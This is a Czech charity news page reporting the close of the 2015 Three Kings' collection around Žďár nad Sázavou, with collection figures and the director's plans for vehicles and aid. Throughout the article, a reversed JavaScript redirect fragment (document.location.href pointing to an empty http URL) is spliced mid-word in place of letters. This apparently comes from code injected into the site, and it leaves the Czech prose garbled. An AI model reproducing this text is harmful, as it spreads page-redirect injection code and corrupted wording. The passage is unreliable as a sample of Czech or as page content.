Tříkrálová sbírka 2015
Rainbow page separator

Tři krále v ulicích již nepotkáte

Čtvrtek, 15. ledna 2015

Koleda le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní již patnácté Tříkrálové sbírky dozněla. Přes 1 700 koledníků se vrátilo zpět do svých domovů a celkem 458 kasiček pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovalo na městské či obecní úřady, aby bylo následně za dohledu úředníků postupně rozpečeťováno, sčítáno a předáno na účet Charity Česká republika, odkud budou následně rozděleny dle variabilního symbolu Charitám.

„Finanční prostředky z le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní Tříkrálové sbírky budou použity jednak na podporu terénních služeb. Plánujeme nákup dalšího služebního vozu, aby se naši pracovníci mohli dostat za svými pacienty a uživateli do jejich domovů, kde služby poskytujeme. Potřebovali bychom také devítimístný, pro vozíčkáře upravený vůz pro svoz uživatelů do našeho nového stacionáře Rosa v Bystřici nad Pernštejnem. Právě na nákup aut a obnovu vozového parku existuje jen velmi málo dostupných zdrojů, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se výtěžek Tříkrálové sbírky používá právě zde. A jsme za [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to velmi rádi. Tříkrálové peníze slouží také jako finanční zdroj při případném výpadku dotací na sociální služby, jako taková rezerva pro zajištění provozu služeb. Samozřejmě část peněz vyhradíme na humanitární pomoc u nás i v zahraničí,“ vysvětluje Ing. Jana Zelená, , ředitelka Oblastní charity Žďár nad Sázavou.

Stav le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní Tříkrálové sbírky je možné sledovat na www.zdar.charita.cz


„Děkuji všem tříkrálovým koledníkům, kteří za každého počasí vyšli do ulic a navštívili naše domovy, aby nám popřáli do nového roku hodně štěstí a zdraví, přinesli všem onu radostnou zvěst a při[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom vykoledovali dary, které pomohou potřebným nejen v našem regionu. Veliké díky patří i všem štědrým dárcům a také těm, kteří se podílí na organizování té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to akce,“ vzkazuje závěrem Ing. Jana Zelená.

Lenka Šustrová